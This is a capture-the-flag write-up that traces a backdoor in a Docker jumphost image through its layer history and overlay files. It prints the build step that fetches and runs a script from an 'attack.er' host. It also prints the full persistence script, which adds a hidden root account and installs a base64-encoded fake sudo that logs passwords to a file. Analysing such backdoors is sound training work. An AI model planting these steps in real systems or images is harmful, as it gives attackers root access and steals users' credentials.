Backdoored Image (Smart Airspace, 200p)
Developers have noticed that latest version of a SSH jumphost which they are using for remote access is acting weirdly.
When inspecting logs, they notice logins from strange accounts that should not be there.
Their own dev account password also seems to be compromised, as logins are coming from unknown IP addresses. Sysadmins have recreated the jumphost container from the latest image but with no luck.
Same activity is still seen. Could the Docker repository be hacked? Could the hackers have tampered with the image? You must find out!
What flag is stored in the backdoor? Pull the jumphost image from docker.io/cybexer/ctf-jumphost:latest and find out how the image was compromised.
solution
Download docker image.
# docker pull docker.io/cybexer/ctf-jumphost:latest
latest: Pulling from cybexer/ctf-jumphost
feac53061382: Pull complete
1aecb0ff55c4: Pull complete
b860e54873fb: Pull complete
d7f08af3407c: Pull complete
b545272ae0e8: Pull complete
3f2b81d958ec: Pull complete
45d84a5f7aa7: Pull complete
92e6070787b9: Pull complete
Digest: sha256:6e8ef7a9c23b0f983fba1d65a2592e86abe38aa23e72f9feb1b8ca01c3c60c30
Status: Downloaded newer image for cybexer/ctf-jumphost:latest
docker.io/cybexer/ctf-jumphost:latestLooking through the docker image (by running a container from it), nothing interesting was found. Take a look at docker image's history.
# docker history --no-trunc cybexer/ctf-jumphost
IMAGE CREATED CREATED BY
sha256:8832240282b04f5b02515d5f54e86d0f4a4d74b8f88b277a17766c57d6d49b47 13 months ago /bin/sh -c #(nop) CMD ["supervisord" "-c" "/etc/supervisor.conf"]
<missing> 13 months ago /bin/sh -c apt-get clean && rm -rf /var/lib/apt/lists/*
<missing> 13 months ago /bin/sh -c rm persistence.sh
<missing> 13 months ago /bin/sh -c echo "172.17.0.1 attack.er" >> /etc/hosts ; wget http://attack.er/persistence.sh && chmod +x persistence.sh && bash persistence.sh
<missing> 13 months ago /bin/sh -c echo "devs:kitten123" | chpasswd
<missing> 13 months ago /bin/sh -c useradd -ms /bin/bash devs
<missing> 13 months ago /bin/sh -c #(nop) COPY file:51921e8d24bb5ab190e183439cdc7e033d6d1cfd9e234835e7b9f6c31753dec7 in /etc/
<missing> 13 months ago /bin/sh -c mkdir -p /var/log/supervisor && mkdir -p /etc/supervisor/conf.d
<missing> 13 months ago /bin/sh -c apt-get -y update && apt-get -y install vim net-tools openssh-server nano wget sudo coreutils supervisor
<missing> 13 months ago /bin/sh -c #(nop) ENV DEBIAN_FRONTEND=noninteractive TZ=Europe/Tallinn
<missing> 14 months ago /bin/sh -c #(nop) CMD ["bash"]
<missing> 14 months ago /bin/sh -c #(nop) ADD file:e729fb032bd2f7cde20fb343da0cd358447e8b23028422c123944e8d0be660fa in /
Interesting file is persistance.sh. Find and review it in docker layers. It contains the flag!
# find /var/lib/docker -name persistence.sh
/var/lib/docker/overlay2/0b4ad13d11e18ca5d30429bc149573fc3f34101e5d79371c7d177aa6190d5035/diff/persistence.sh
/var/lib/docker/overlay2/2ca3e2aed23ad6d6293c469880a1d847740a5cd44c1ad2e2bcba23c1197f18f7/diff/persistence.sh# cat /var/lib/docker/overlay2/0b4ad13d11e18ca5d30429bc149573fc3f34101e5d79371c7d177aa6190d5035/diff/persistence.sh
#!/bin/bash
# Planting persistence
###############################################
# FLAG = d4da58b6-d572-4992-8342-7747969911d5 #
###############################################
useradd -ou 0 -g 0 systemservice
echo "systemservice:backdoorpass1" | chpasswd
mkdir /home/devs/.hidden
echo "IyBGbGFnIGlzIG5vdCBoZXJlIDooCgpyZWFkIC1zcCAiW3N1ZG9dIHBhc3N3b3JkIGZvciAkVVNF
UjogIiBzdWRvcGFzcwplY2hvICIiCnNsZWVwIDIKZWNobyAiU29ycnksIHRyeSBhZ2Fpbi4iCmVj
aG8gJHN1ZG9wYXNzID4+IC90bXAvcGFzcy50eHQKCi91c3IvYmluL3N1ZG8gJEAK" | base64 -d > /home/devs/.hidden/fsudo
chmod a+x /home/devs/.hidden/fsudo
echo "alias sudo=~/.hidden/fsudo" >> /home/devs/.bashrc
Flag is d4da58b6-d572-4992-8342-7747969911d5.
